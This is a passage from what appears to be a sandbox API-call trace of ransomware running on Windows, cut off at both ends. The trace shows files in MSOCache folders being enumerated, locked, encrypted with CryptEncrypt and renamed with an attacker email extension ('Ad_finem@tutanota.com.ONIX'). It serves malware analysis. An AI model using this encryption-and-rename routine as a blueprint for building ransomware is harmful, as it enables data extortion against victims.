lpNumberOfBytesRead=0x367f44c*=0x251f, lpOverlapped=0x0) returned 1 [0101.059] SetFilePointer (in: hFile=0x398, lDistanceToMove=-9503, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.059] WriteFile (in: hFile=0x398, lpBuffer=0x4b9090*, nNumberOfBytesToWrite=0x251f, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b9090*, lpNumberOfBytesWritten=0x367f44c*=0x251f, lpOverlapped=0x0) returned 1 [0101.060] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b6b68 | out: hHeap=0x410000) returned 1 [0101.060] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b9090 | out: hHeap=0x410000) returned 1 [0101.060] UnlockFile (hFile=0x398, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x251f, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0101.060] CloseHandle (hObject=0x398) returned 1 [0101.061] GetProcessHeap () returned 0x410000 [0101.061] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0101.061] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\VisioMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-0054-0409-1000-0000000ff1ce}-c\\visiomui.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0101.063] GetProcessHeap () returned 0x410000 [0101.063] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0101.063] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0101.063] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0101.063] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x460008 | out: hHeap=0x410000) returned 1 [0101.064] FindNextFileW (in: hFindFile=0x48eaf0, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f0a8e20, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f0a8e20, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x4359ac00, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x251f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VisioMUI.xml", cAlternateFileName="")) returned 0 [0101.064] CloseHandle (hObject=0x3cc) returned 1 [0101.064] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0101.064] GetSystemTime (in: lpSystemTime=0x530400 | out: lpSystemTime=0x530400*(wYear=0x7e4, wMonth=0x3, wDayOfWeek=0x3, wDay=0x4, wHour=0x11, wMinute=0x6, wSecond=0x28, wMilliseconds=0x1be)) [0101.064] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x540000 [0101.064] GetWindowsDirectoryW (in: lpBuffer=0x540000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0101.064] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x540200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x540600, lpMaximumComponentLength=0x540608, lpFileSystemFlags=0x540604, lpFileSystemNameBuffer=0x540400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x540600*=0x9c354b42, lpMaximumComponentLength=0x540608*=0xff, lpFileSystemFlags=0x540604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0101.064] wsprintfW (in: param_1=0x530000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock") returned 86 [0101.065] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C9c354ca09c354b444c.lock" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c9c354ca09c354b444c.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x3cc [0101.065] VirtualFree (lpAddress=0x540000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.065] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.065] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x90) returned 0x460008 [0101.065] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0101.065] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x458748 | out: hHeap=0x410000) returned 1 [0101.065] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47f630 | out: hHeap=0x410000) returned 1 [0101.065] FindFirstFileW (in: lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c1c230, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x48eb30 [0101.065] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0101.065] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0101.065] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458748 [0101.065] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0101.065] GetLastError () returned 0x0 [0101.066] FindNextFileW (in: hFindFile=0x48eb30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x30c1c230, ftLastAccessTime.dwHighDateTime=0x1d5f247, ftLastWriteTime.dwLowDateTime=0x30c1c230, ftLastWriteTime.dwHighDateTime=0x1d5f247, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0101.067] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0101.067] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0101.067] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458748 [0101.067] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0101.067] GetLastError () returned 0x0 [0101.067] FindNextFileW (in: hFindFile=0x48eb30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0101.067] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0101.067] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0101.067] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458748 [0101.067] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0101.067] GetLastError () returned 0x0 [0101.067] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x394 [0101.067] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0101.067] LockFile (hFile=0x394, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x263400, nNumberOfBytesToLockHigh=0x0) returned 1 [0101.067] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.067] ReadFile (in: hFile=0x394, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0101.069] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.069] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.069] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0101.069] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0101.069] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi", dwFileAttributes=0x80) returned 1 [0101.069] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned 78 [0101.069] GetProcessHeap () returned 0x410000 [0101.069] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10c) returned 0x467908 [0101.069] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" [0101.069] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0101.069] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=2503680) returned 1 [0101.069] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x263400 [0101.069] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0101.069] GetProcessHeap () returned 0x410000 [0101.069] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0101.069] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0101.070] WriteFile (in: hFile=0x394, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0101.071] WriteFile (in: hFile=0x394, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0101.072] WriteFile (in: hFile=0x394, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0101.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x263400) returned 0x3680020 [0101.073] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x263400) returned 0x38f0020 [0101.074] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.074] ReadFile (in: hFile=0x394, lpBuffer=0x3680020, nNumberOfBytesToRead=0x263400, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x3680020*, lpNumberOfBytesRead=0x367f44c*=0x263400, lpOverlapped=0x0) returned 1 [0101.251] UnlockFile (hFile=0x394, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x263400, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0101.251] CloseHandle (hObject=0x394) returned 1 [0101.252] GetProcessHeap () returned 0x410000 [0101.252] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0101.252] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.msi.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.msi.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0101.255] GetProcessHeap () returned 0x410000 [0101.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0101.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0101.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0101.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0101.255] FindNextFileW (in: hFindFile=0x48eb30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x43f88c00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x43f88c00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf58ed930, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x646, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OneNoteMUI.xml", cAlternateFileName="ONENOT~1.XML")) returned 1 [0101.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0101.255] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0101.255] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458748 [0101.255] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0101.255] GetLastError () returned 0x0 [0101.255] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x394 [0101.255] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0101.255] LockFile (hFile=0x394, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x646, nNumberOfBytesToLockHigh=0x0) returned 1 [0101.255] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.256] ReadFile (in: hFile=0x394, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0101.257] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.257] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.257] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0101.257] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0101.257] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", dwFileAttributes=0x80) returned 1 [0101.258] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned 78 [0101.258] GetProcessHeap () returned 0x410000 [0101.258] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10c) returned 0x467908 [0101.258] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" [0101.258] lstrcatW (in: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml", lpString2=".12781717671972521061.Ad_finem@tutanota.com.ONIX" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX") returned="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" [0101.258] GetFileSizeEx (in: hFile=0x394, lpFileSize=0x367f440 | out: lpFileSize=0x367f440*=1606) returned 1 [0101.258] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x367f410*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x367f410*=0) returned 0x646 [0101.258] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x367f42c*=0x20, dwBufLen=0x20 | out: pbData=0x0*, pdwDataLen=0x367f42c*=0x100) returned 1 [0101.258] GetProcessHeap () returned 0x410000 [0101.258] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x100) returned 0x473050 [0101.258] CryptEncrypt (in: hKey=0x447a68, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x473050*, pdwDataLen=0x367f414*=0x20, dwBufLen=0x100 | out: pbData=0x473050*, pdwDataLen=0x367f414*=0x100) returned 1 [0101.258] WriteFile (in: hFile=0x394, lpBuffer=0x473050*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x473050*, lpNumberOfBytesWritten=0x367f44c*=0x100, lpOverlapped=0x0) returned 1 [0101.260] WriteFile (in: hFile=0x394, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x8, lpOverlapped=0x0) returned 1 [0101.262] WriteFile (in: hFile=0x394, lpBuffer=0x4b2770*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4b2770*, lpNumberOfBytesWritten=0x367f44c*=0x4, lpOverlapped=0x0) returned 1 [0101.263] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x646) returned 0x4d6b68 [0101.264] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x646) returned 0x4d71b8 [0101.264] SetFilePointer (in: hFile=0x394, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.264] ReadFile (in: hFile=0x394, lpBuffer=0x4d6b68, nNumberOfBytesToRead=0x646, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d6b68*, lpNumberOfBytesRead=0x367f44c*=0x646, lpOverlapped=0x0) returned 1 [0101.264] SetFilePointer (in: hFile=0x394, lDistanceToMove=-1606, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.264] WriteFile (in: hFile=0x394, lpBuffer=0x4d71b8*, nNumberOfBytesToWrite=0x646, lpNumberOfBytesWritten=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x4d71b8*, lpNumberOfBytesWritten=0x367f44c*=0x646, lpOverlapped=0x0) returned 1 [0101.265] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d6b68 | out: hHeap=0x410000) returned 1 [0101.265] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4d71b8 | out: hHeap=0x410000) returned 1 [0101.265] UnlockFile (hFile=0x394, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToUnlockLow=0x646, nNumberOfBytesToUnlockHigh=0x0) returned 1 [0101.265] CloseHandle (hObject=0x394) returned 1 [0101.266] GetProcessHeap () returned 0x410000 [0101.266] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x473050 | out: hHeap=0x410000) returned 1 [0101.266] MoveFileExW (lpExistingFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml"), lpNewFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OneNoteMUI.xml.12781717671972521061.Ad_finem@tutanota.com.ONIX" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onenotemui.xml.12781717671972521061.ad_finem@tutanota.com.onix"), dwFlags=0x8) returned 1 [0101.269] GetProcessHeap () returned 0x410000 [0101.269] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x467908 | out: hHeap=0x410000) returned 1 [0101.269] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x48df08 | out: hHeap=0x410000) returned 1 [0101.269] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4b2770 | out: hHeap=0x410000) returned 1 [0101.269] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x449d98 | out: hHeap=0x410000) returned 1 [0101.269] FindNextFileW (in: hFindFile=0x48eb30, lpFindFileData=0x367f600 | out: lpFindFileData=0x367f600*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36db9d00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x36db9d00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5e95540, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10a5df8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OnoteLR.cab", cAlternateFileName="")) returned 1 [0101.269] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43e3f8 | out: hHeap=0x410000) returned 1 [0101.269] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x40) returned 0x425080 [0101.269] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x80) returned 0x458748 [0101.269] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x425080 | out: hHeap=0x410000) returned 1 [0101.269] GetLastError () returned 0x0 [0101.269] CreateFileW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00a1-0409-1000-0000000ff1ce}-c\\onotelr.cab"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x394 [0101.270] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x530000 [0101.270] LockFile (hFile=0x394, dwFileOffsetLow=0x0, dwFileOffsetHigh=0x0, nNumberOfBytesToLockLow=0x10a5df8, nNumberOfBytesToLockHigh=0x0) returned 1 [0101.270] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0101.270] ReadFile (in: hFile=0x394, lpBuffer=0x530000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x367f44c, lpOverlapped=0x0 | out: lpBuffer=0x530000*, lpNumberOfBytesRead=0x367f44c*=0x21c, lpOverlapped=0x0) returned 1 [0101.272] SetFilePointerEx (in: hFile=0x394, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.272] VirtualFree (lpAddress=0x530000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.273] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x20, pbBuffer=0x48df08 | out: pbBuffer=0x48df08) returned 1 [0101.273] CryptGenRandom (in: hProv=0x4581f8, dwLen=0x8, pbBuffer=0x4b2770 | out: pbBuffer=0x4b2770) returned 1 [0101.273] SetFileAttributesW (lpFileName="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab", dwFileAttributes=0x80) returned 1 [0101.273] lstrlenW (lpString="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned 75 [0101.273] GetProcessHeap () returned 0x410000 [0101.273] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x106) returned 0x467908 [0101.273] lstrcpyW (in: lpString1=0x467908, lpString2="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab" | out: lpString1="C:\\\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\OnoteLR.cab") returned="C:\\\\MSOCache\\All 